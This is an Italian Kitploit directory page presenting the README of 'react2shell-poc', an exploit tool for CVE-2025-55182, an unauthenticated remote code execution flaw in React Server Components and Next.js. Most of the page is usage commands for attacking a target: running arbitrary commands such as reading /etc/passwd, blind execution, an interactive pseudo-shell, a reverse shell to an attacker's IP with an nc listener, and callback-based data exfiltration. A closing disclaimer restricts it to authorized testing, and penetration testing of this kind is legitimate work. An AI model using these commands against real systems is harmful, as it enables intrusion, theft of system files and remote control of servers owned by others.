Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - RCE critica in React Server Components / Next.js. CVSS 10.0. Esfiltrazione basata su errori, reverse shell, modalità interattiva. | Kitploit
Strumenti/GitHubGitHub/p3ta00/react2shell-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso Remoto
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - RCE critica in React Server Components / Next.js. CVSS 10.0. Esfiltrazione basata su errori, reverse shell, modalità interattiva.

912 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

React2Shell - CVE-2025-55182 PoC

Proof of Concept per CVE-2025-55182, una vulnerabilità critica di esecuzione remota di codice non autenticata nei React Server Components.

Punteggio CVSS: 10.0 (Critico)

Vulnerabilità

La vulnerabilità risiede nel deserializzatore del protocollo Flight di React. Sfruttando la prototype pollution tramite payload appositamente costruiti, un attaccante può ottenere l'esecuzione arbitraria di codice sulle applicazioni Next.js vulnerabili.

Versioni interessate

ProdottoVulnerabileCorretto
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Installazione

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Utilizzo

Esecuzione di comandi con output (predefinita - esfiltrazione basata su errori)

L'output viene restituito direttamente nella risposta HTTP tramite l'errore NEXT_REDIRECT: nessun server di callback necessario.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Modalità interattiva

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

Verifica della vulnerabilità

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

RCE cieca (senza output)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Reverse shell

root@kitploit:~
# Start listener
nc -lvnp 4444

# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Legacy: esfiltrazione basata su callback

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Opzioni

root@kitploit:~
-t, --target       Target URL (required)
-c, --command      Command to execute (output via error-based exfil by default)
--check            Check if target is vulnerable
--blind            Blind RCE mode (no output capture)
--listen           Use callback server instead of error-based exfil
-i, --interactive  Interactive pseudo-shell mode
--revshell         Attempt reverse shell
--lhost            Attacker IP for callbacks/reverse shell
--lport            Callback port (default: 9999)
--callback         Manual callback URL
--timeout          Request timeout in seconds (default: 30)

Come funziona

Il metodo di esfiltrazione predefinito utilizza l'iniezione dell'errore NEXT_REDIRECT:

  1. Esegue il comando e cattura l'output
  2. Genera un errore NEXT_REDIRECT con l'output nel campo digest
  3. Next.js serializza l'errore nella risposta Flight
  4. L'output appare direttamente nel corpo della risposta HTTP

Questo metodo è più affidabile dell'esfiltrazione basata su callback perché non richiede accesso di rete in uscita dal target.

Riferimenti

  • Wiz Security - Divulgazione React2Shell
  • Analisi di Datadog Security Labs
  • NVD - CVE-2025-55182

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottenere sempre la dovuta autorizzazione prima di eseguire qualsiasi test.

Autore

p3ta

Scarica lo strumento